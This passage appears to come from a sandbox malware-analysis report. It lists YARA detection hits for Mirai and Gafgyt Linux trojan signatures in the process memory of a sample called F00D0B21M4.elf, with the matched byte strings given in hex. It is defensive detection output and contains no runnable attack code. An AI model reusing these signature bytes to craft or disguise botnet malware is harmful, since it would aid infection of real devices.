2F 78 33 38 2F 78 46 4A 2F 0x10edc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ef0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6208.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x112b1:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6219.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6219.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10d60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d88:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d9c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10db0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dc4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dd8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e00:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e14:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e28:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e3c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ea0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10eb4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ec8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10edc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ef0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6219.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x112b1:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6205.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6205.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10d60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d88:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d9c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10db0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dc4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dd8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e00:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e14:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e28:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e3c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ea0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10eb4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ec8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10edc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ef0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6205.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x112b1:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
6220.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
6220.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x10d60:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d74:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d88:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10d9c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10db0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dc4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dd8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10dec:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e00:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e14:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e28:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e3c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e50:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e64:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e78:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10e8c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ea0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10eb4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ec8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10edc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x10ef0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
6220.1.00007f3e38001000.00007f3e38014000.r-x.sdmp	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x112b1:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: F00D0B21M4.elf PID: 6203	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1158:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x116c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1180:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1194:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x11f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x120c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1220:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1234:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1248:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x125c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1270:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1284:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1298:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: F00D0B21M4.elf PID: 6203	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x1616:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: F00D0B21M4.elf PID: 6206	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1455d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14571:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14585:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14599:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x145ad:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x145c1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x145d5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x145e9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x145fd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14611:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14625:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14639:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1464d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14661:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14675:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x14689:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1469d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x146b1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x146c5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x146d9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x146ed:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: F00D0B21M4.elf PID: 6206	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x14a1b:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: F00D0B21M4.elf PID: 6208	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x12f68:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12f7c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12f90:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12fa4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12fb8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12fcc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12fe0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x12ff4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13008:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1301c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13030:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13044:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13058:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1306c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13080:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x13094:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x130a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x130bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x130d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x130e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x130f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: F00D0B21M4.elf PID: 6208	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x13426:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: F00D0B21M4.elf PID: 6211	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x64b4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x64c8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x64dc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x64f0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6504:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6518:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x652c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6540:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6554:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6568:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x657c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6590:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x65a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x65b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x65cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x65e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x65f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6608:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x661c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6630:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x6644:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: F00D0B21M4.elf PID: 6211	Linux_Trojan_Gafgyt_ea92cca8	unknown	unknown	0x6972:$a: 53 65 6C 66 20 52 65 70 20 46 75 63 6B 69 6E 67 20 4E 65 54 69 53 20 61 6E 64
Process Memory Space: F00D0B21M4.elf PID: 6212	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0xb6d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xb81:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xb95:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xba9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xbbd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xbd1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xbe5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xbf9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xc0d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xc21:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xc35:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xc49:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xc5d:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xc71:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xc85:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xc99:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xcad:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xcc1:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xcd5:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xce9:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0xcfd:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
